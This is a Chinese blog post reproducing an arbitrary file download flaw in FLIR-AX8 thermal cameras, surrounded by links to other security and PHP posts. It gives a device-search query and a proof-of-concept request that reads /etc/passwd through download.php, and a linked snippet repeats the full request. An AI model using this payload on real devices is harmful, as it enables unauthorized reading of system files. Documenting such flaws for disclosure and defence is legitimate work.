FLIR-AX8 download.php 任意文件下载

最新推荐文章于 2025-06-10 16:08:33 发布
最新推荐文章于 2025-06-10 16:08:33 发布
阅读量869 收藏
点赞数
分类专栏: 网络安全 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_17754023/article/details/127706323
版权
FLIR-AX8的download.php文件存在过滤不全的问题,导致出现任意文件下载漏洞。攻击者可通过特定URL参数下载服务器上的任意文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述

FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞

漏洞影响

FLIR-AX8

网络测绘

app="FLIR-FLIR-AX8"

 

漏洞复现

登录页面

 

验证POC

/download.php?file=/etc/passwd

FLIR AX8 download.php 任意文件读取复现
iSee857的博客
10-08 925
FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。如非必要 请勿将系统在公网部署。
FLIR-AX8 任意文件下载(CNVD-2021-39018)
BeWorthyOf的博客
11-18 3312
FLIR-AX8存在任意文件下载漏洞。攻击者可利用漏洞下载相关系统配置文件。
FLIR-AX8 任意文件下载
thelostworld
05-12 576
FLIR-AX8 任意文件下载一、漏洞描述FLIR-AX8 download.php存在任意文件下载漏洞,直接访问可下载相关系统配置文件。二、影响版本FLIR-AX8三、漏洞复现访问主页:详细数据包:GET /download.php?file=/etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
【春秋云镜】CVE-2023-2130漏洞复现exp
m0_74786138的博客
06-09 324
​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。影响版本SourceCodester采购订单管理系统 1.0。
端口转发和SSH隧道的含义详解及使用方法
Kaede6的博客
06-10 202
在网络视界中,端口转发和SSH隧道就像搭建秘密通道的工程术。它们能帮你安全穿越防火墙、访问受限制的资源,让网络连接更灵活安全
PHP 表单 - 验证邮件和URL
csbysj2020
06-07 230
本文介绍了在PHP中验证邮件和URL的方法。通过以上代码示例,我们可以轻松实现邮件和URL的格式验证、存在性验证和有效性验证。在实际开发过程中,根据具体需求,我们可以对代码进行优化和调整。同时,我们也应关注用户体验,为用户提供清晰的提示信息,以提高表单的健壮性和用户满意度。
[BJDCTF2020]Easy MD5 1
qq_52957703的博客
06-06 848
要注意的是这种情况是必须要有单引号括起来的,比如password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1 ,也就相当于password=‘xxx’ or true,所以返回值就是true。当然如果只有数字的话,就不需要单引号,比如password=‘xxx’ or 1,那么返回值也是true。,这可能导致一些非预期的行为,甚至引发安全漏洞(如认证绕过、密码校验绕过等)。,等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数。
PHP7内核剖析 学习笔记 第十章 扩展开发(1)
tus00000的博客
06-09 589
php_ini_register_extensions()中将遍历php_extension_lists.engine和php_extension_lists.functions,然后分别调用php_load_zend_extension_cb、php_load_php_extension_cb完成Zend扩展、PHP扩展的加载。extname参数是扩展名;共享库形式需要将库名加入php.ini文件中,在php_module_startup()阶段会将php.ini中的对应的扩展共享库加载到PHP中。
BugKu Web渗透之网站被hei(仅仅是ctf题目名称)
cai_huaer的博客
06-06 707
(其实就是自己选择爆破的位数和爆破的字母和数字,一个个去组合。等了很久,终于爆破出来,密码是hack。3.Payload settings,选择最短的爆破长度 Min length 和最长爆破长度 Max length。比如最短写上4,最长写上6,那么就是爆破长度为4,5,6的密码。如果你需要用数字爆破,那么写上0123456789,如果需要小写字母爆破,就写上26个小写英文字母。shell.php这个页面需要密码,继续查看其他页面,看有没有哪个页面有写出密码的。最后结果查找长度不同的,一般就是爆破成功。
XCTF-web-easyupload
qq_52273419的博客
06-09 200
试了试phpphp7,pht,phtml等,都没有用。抓包修改将.user.ini修改为jpg图片。在上传一个123.jpg。用蚁剑连接,得到flag。尝试.user.ini。
使用swoole作为MQTT客户端并接收实现即时消息推送
少湖说
06-06 365
本文介绍了基于Swoole的MQTT客户端搭建流程。首先需要安装Swoole扩展,可通过pecl或使用预构建的Docker镜像完成。然后通过Composer安装MQTT客户端库,并编写业务逻辑代码实现MQTT连接、认证和主题订阅功能。代码示例展示了如何设置MQTT客户端参数和处理消息回调。执行时需要以常驻进程方式运行,并建议使用Supervisor进行进程管理以确保服务稳定运行。全文提供了从环境准备到部署的完整解决方案,适用于需要可靠MQTT通信的场景。
docker 搭建php 开发环境 添加扩展redis、swoole、xdebug(2)
hanzhuhuaa的博客
06-05 322
本文介绍了使用Docker Compose搭建LNMP环境的配置方法。主要包含:1) docker-compose.yml文件配置,定义了nginx(映射80端口)、php(自定义Dockerfile构建)和mysql(设置root密码)三个服务,并加入lnmp网络;2) 相关操作命令,包括启动/停止服务和查看容器状态;3) 提供了PHP7.4的Dockerfile配置细节,包含时区设置、GD扩展安装及Redis/Xdebug等常用扩展的安装方法;4) 可直接使用预构建的PHP镜像fangsinan/php
【FTP】ftp文件传输会丢包吗?批量几百个文件传输,有一些文件没有传输完整,如何解决?
hqyhqyhq的专栏
06-09 753
方法是否推荐说明✅ 推荐支持断点续传、自动重试✅ 推荐可定制性强,适合自动化手动 FTP 工具⚠️ 一般易出错,缺乏日志和校验单次上传大量文件❌ 不推荐容易失败且难排查启用日志和校验✅ 必须是排查问题的关键手段如果你提供具体的 FTP 客户端或代码片段,我可以帮你进一步优化传输逻辑。
PHP】导入excel 报错Trying to access array offset on value of type int
Kevin_Gates的专栏
06-10 218
phpexcel1.8.0导入报错 trying to access array offset on value of type int .php7.4环境下报错。
学校招生小程序源码介绍
wx_cxc2848698918的博客
06-10 70
系统登录所需信息由学校管理人员提供,程序不采集用户账号信息,保障用户隐私。此外,还设置了用户协议和隐私政策确认环节,合规且安心。从技术架构来看,ThinkPHP提供稳定可靠的后台服务,FastAdmin加速开发流程,UniApp则保障小程序在多端有良好的兼容性和流畅度。基于ThinkPHP+FastAdmin+UniApp开发的学校招生小程序源码,专为学校招生场景量身打造,功能实用且操作便捷。对于学校招生人员而言,此源码搭建的小程序能有效提升招生效率,方便管理招生信息。
CPU性能篇-系统CPU使用率很高,但找不到高CPU的应用-Day 04
最新发布
qq_42515722的博客
06-10 509
本章主要介绍了,系统CPU占用异常,但却无法通过常规手段找到相关进程的解决办法。
网络原理5 - TCP4
CxK6666667的博客
06-07 968
在之前的文章中,我们已经介绍了TCP的5个机制:确认应答、超时重传、连接管理、滑动窗口和流量控制,接下来我们来学习TCP的另外五个机制。
CMake GLOB返回路径规则及示例
我的博客
06-06 935
file(GLOB)
如何使用 Ansible 在 Ubuntu 24.04 上安装和设置 LNMP
介绍AWS Azure GCP devops Terraform 等技术
06-09 731
《使用Ansible在Ubuntu 24.04上自动化部署LNMP堆栈》摘要:本文详细介绍了如何通过Ansible自动化工具在Ubuntu服务器上部署LNMP(Linux/Nginx/MySQL/PHP)环境。主要内容包括:1) 准备工作,需配置Ansible控制节点和远程主机;2) 剧本功能说明,可实现自动化安装软件包、配置Nginx、设置MySQL安全及防火墙规则等操作;3) 提供完整的剧本结构、变量定义和Jinja2模板文件示例;4) 运行剧本后,服务器将自动完成LNMP环境搭建,通过访问指定URL可
python调用Flir.Atlas.Image.dll文件进行红外数据测量代码
09-13
在Python中调用Windows动态链接库(DLL)文件通常涉及使用`ctypes`模块,该模块允许Python代码加载DLL文件并调用其函数。`Flir.Atlas.Image.dll`是一个可能由FLIR热像仪或类似设备提供的库,用于处理红外图像数据。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值